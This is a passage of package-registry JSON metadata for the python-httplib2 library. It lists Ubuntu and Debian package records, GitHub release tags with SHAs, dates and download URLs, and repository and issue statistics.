:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-23T11:24:15.119Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/ubuntu/python-httplib2?arch=source\u0026distro=ubuntu-20.04\u0026repository_url=https://launchpad.net/ubuntu/focal","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/ubuntu/python-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/ubuntu/python-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/ubuntu/python-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T12:38:31.362Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-20.04/packages/python-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-20.04/packages/python-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-20.04/packages/python-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-20.04/packages/python-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-20.04/packages/python-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-20.04/packages/python-httplib2/codemeta","maintainers":[],"registry":{"name":"ubuntu-20.04","url":"https://launchpad.net/ubuntu/focal","ecosystem":"ubuntu","default":false,"packages_count":30789,"maintainers_count":0,"namespaces_count":4,"keywords_count":1429,"github":"ubuntu","metadata":{"codename":"focal","funded_packages_count":759},"icon_url":"https://github.com/ubuntu.png","created_at":"2026-02-04T11:01:47.233Z","updated_at":"2026-08-25T05:06:53.666Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-20.04/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-20.04/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-20.04/namespaces"}},{"id":13601880,"name":"python-httplib2","ecosystem":"debian","description":null,"homepage":"https://github.com/httplib2/httplib2","licenses":"other","normalized_licenses":[],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":["libs"],"namespace":"main","versions_count":1,"first_release_published_at":"2026-02-11T10:56:12.344Z","latest_release_published_at":"2026-02-11T10:56:12.344Z","latest_release_number":"0.11.3-2","last_synced_at":"2026-08-03T12:52:31.058Z","created_at":"2026-02-11T10:56:12.129Z","updated_at":"2026-08-21T13:16:28.776Z","registry_url":"https://tracker.debian.org/pkg/python-httplib2","install_command":"apt-get install python-httplib2","documentation_url":"https://packages.debian.org/buster/python-httplib2","metadata":{"component":"main","architecture":"all","priority":"source","binary":"python-httplib2, python3-httplib2","standards_version":"4.3.0","maintainer":"Debian Python Modules Team \u003cpython-modules-team@lists.alioth.debian.org\u003e","build_depends":"debhelper (\u003e= 11~), dh-python, python-all (\u003e= 2.6.6-3~), python-setuptools, python3-all (\u003e= 3.1.2-10), python3-setuptools","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":511,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-14T10:56:27.493Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-14T08:37:00.000